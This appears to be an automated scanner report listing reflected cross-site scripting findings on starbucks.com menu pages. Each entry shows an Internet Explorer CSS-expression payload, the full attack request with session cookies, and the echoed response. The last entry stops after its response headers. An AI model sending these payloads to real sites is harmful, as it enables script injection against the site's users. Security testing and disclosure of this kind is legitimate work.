HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:38:10 GMT Connection: close Content-Length: 40599
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/kids-drinks-and-other/steamed-apple-juice?39769"style="x:expression(alert(1))"720efc59f16=1"/> ...[SNIP]...
1.788. http://www.starbucks.com/menu/drinks/tazo-tea/awake [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/tazo-tea/awake
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92f97"style%3d"x%3aexpression(alert(1))"47495068b64 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 92f97"style="x:expression(alert(1))"47495068b64 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/tazo-tea/awake?92f97"style%3d"x%3aexpression(alert(1))"47495068b64=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:38:01 GMT Connection: close Content-Length: 42135
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/awake?92f97"style="x:expression(alert(1))"47495068b64=1"/> ...[SNIP]...
1.789. http://www.starbucks.com/menu/drinks/tazo-tea/awake-tea-latte [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/tazo-tea/awake-tea-latte
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e510"style%3d"x%3aexpression(alert(1))"35729b21c4d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9e510"style="x:expression(alert(1))"35729b21c4d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/tazo-tea/awake-tea-latte?9e510"style%3d"x%3aexpression(alert(1))"35729b21c4d=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:38:00 GMT Connection: close Content-Length: 42264
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/awake-tea-latte?9e510"style="x:expression(alert(1))"35729b21c4d=1"/> ...[SNIP]...
1.790. http://www.starbucks.com/menu/drinks/tazo-tea/black-shaken-iced-tea [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/tazo-tea/black-shaken-iced-tea
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f45fc"style%3d"x%3aexpression(alert(1))"a995444f9d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f45fc"style="x:expression(alert(1))"a995444f9d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/tazo-tea/black-shaken-iced-tea?f45fc"style%3d"x%3aexpression(alert(1))"a995444f9d1=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:38:40 GMT Connection: close Content-Length: 42142
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/black-shaken-iced-tea?f45fc"style="x:expression(alert(1))"a995444f9d1=1"/> ...[SNIP]...
1.791. http://www.starbucks.com/menu/drinks/tazo-tea/calm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/tazo-tea/calm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d301f"style%3d"x%3aexpression(alert(1))"615fe6659bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d301f"style="x:expression(alert(1))"615fe6659bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/tazo-tea/calm?d301f"style%3d"x%3aexpression(alert(1))"615fe6659bf=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:39:24 GMT Connection: close Content-Length: 42122
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/calm?d301f"style="x:expression(alert(1))"615fe6659bf=1"/> ...[SNIP]...
1.792. http://www.starbucks.com/menu/drinks/tazo-tea/chai-latte [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/tazo-tea/chai-latte
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1fa3"style%3d"x%3aexpression(alert(1))"8b53a955b6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1fa3"style="x:expression(alert(1))"8b53a955b6c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/tazo-tea/chai-latte?d1fa3"style%3d"x%3aexpression(alert(1))"8b53a955b6c=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:39:19 GMT Connection: close Content-Length: 42396
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/chai-latte?d1fa3"style="x:expression(alert(1))"8b53a955b6c=1"/> ...[SNIP]...
1.793. http://www.starbucks.com/menu/drinks/tazo-tea/china-green-tips [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/tazo-tea/china-green-tips
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 122aa"style%3d"x%3aexpression(alert(1))"99a1446dfba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 122aa"style="x:expression(alert(1))"99a1446dfba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/tazo-tea/china-green-tips?122aa"style%3d"x%3aexpression(alert(1))"99a1446dfba=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:39:32 GMT Connection: close Content-Length: 42109
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/china-green-tips?122aa"style="x:expression(alert(1))"99a1446dfba=1"/> ...[SNIP]...
1.794. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/tazo-tea/earl-grey
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a03d"style%3d"x%3aexpression(alert(1))"28dfe317897 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4a03d"style="x:expression(alert(1))"28dfe317897 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/tazo-tea/earl-grey?4a03d"style%3d"x%3aexpression(alert(1))"28dfe317897=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:39:22 GMT Connection: close Content-Length: 42144
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey?4a03d"style="x:expression(alert(1))"28dfe317897=1"/> ...[SNIP]...
1.795. http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey-tea-latte [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/tazo-tea/earl-grey-tea-latte
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 949d1"style%3d"x%3aexpression(alert(1))"6eaf867621e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 949d1"style="x:expression(alert(1))"6eaf867621e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/tazo-tea/earl-grey-tea-latte?949d1"style%3d"x%3aexpression(alert(1))"6eaf867621e=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:39:35 GMT Connection: close Content-Length: 42568
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/earl-grey-tea-latte?949d1"style="x:expression(alert(1))"6eaf867621e=1"/> ...[SNIP]...
1.796. http://www.starbucks.com/menu/drinks/tazo-tea/green-tea-latte [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/tazo-tea/green-tea-latte
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8da2d"style%3d"x%3aexpression(alert(1))"8c880f3ec91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8da2d"style="x:expression(alert(1))"8c880f3ec91 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/tazo-tea/green-tea-latte?8da2d"style%3d"x%3aexpression(alert(1))"8c880f3ec91=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:39:44 GMT Connection: close Content-Length: 42307
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/green-tea-latte?8da2d"style="x:expression(alert(1))"8c880f3ec91=1"/> ...[SNIP]...
1.797. http://www.starbucks.com/menu/drinks/tazo-tea/iced-awake-tea-latte [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/tazo-tea/iced-awake-tea-latte
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c81c"style%3d"x%3aexpression(alert(1))"7da409656c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9c81c"style="x:expression(alert(1))"7da409656c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/tazo-tea/iced-awake-tea-latte?9c81c"style%3d"x%3aexpression(alert(1))"7da409656c1=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:39:33 GMT Connection: close Content-Length: 42304
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/iced-awake-tea-latte?9c81c"style="x:expression(alert(1))"7da409656c1=1"/> ...[SNIP]...
1.798. http://www.starbucks.com/menu/drinks/tazo-tea/iced-chai-tea-latte [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/tazo-tea/iced-chai-tea-latte
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eef62"style%3d"x%3aexpression(alert(1))"cb85efc8b12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eef62"style="x:expression(alert(1))"cb85efc8b12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/tazo-tea/iced-chai-tea-latte?eef62"style%3d"x%3aexpression(alert(1))"cb85efc8b12=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:40:14 GMT Connection: close Content-Length: 42257
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/iced-chai-tea-latte?eef62"style="x:expression(alert(1))"cb85efc8b12=1"/> ...[SNIP]...
1.799. http://www.starbucks.com/menu/drinks/tazo-tea/iced-green-tea-latte [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/tazo-tea/iced-green-tea-latte
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66681"style%3d"x%3aexpression(alert(1))"aa6c3571345 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66681"style="x:expression(alert(1))"aa6c3571345 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/tazo-tea/iced-green-tea-latte?66681"style%3d"x%3aexpression(alert(1))"aa6c3571345=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:40:22 GMT Connection: close Content-Length: 42181
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/iced-green-tea-latte?66681"style="x:expression(alert(1))"aa6c3571345=1"/> ...[SNIP]...
1.800. http://www.starbucks.com/menu/drinks/tazo-tea/orange-blossom [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/tazo-tea/orange-blossom
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69b3b"style%3d"x%3aexpression(alert(1))"d90ff2f9eda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 69b3b"style="x:expression(alert(1))"d90ff2f9eda in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/tazo-tea/orange-blossom?69b3b"style%3d"x%3aexpression(alert(1))"d90ff2f9eda=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:40:25 GMT Connection: close Content-Length: 42425
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/tazo-tea/orange-blossom?69b3b"style="x:expression(alert(1))"d90ff2f9eda=1"/> ...[SNIP]...
1.801. http://www.starbucks.com/menu/drinks/tazo-tea/passion [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/tazo-tea/passion
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cff50"style%3d"x%3aexpression(alert(1))"adbc9364b13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cff50"style="x:expression(alert(1))"adbc9364b13 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/tazo-tea/passion?cff50"style%3d"x%3aexpression(alert(1))"adbc9364b13=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:40:49 GMT Connection: close Content-Length: 42330
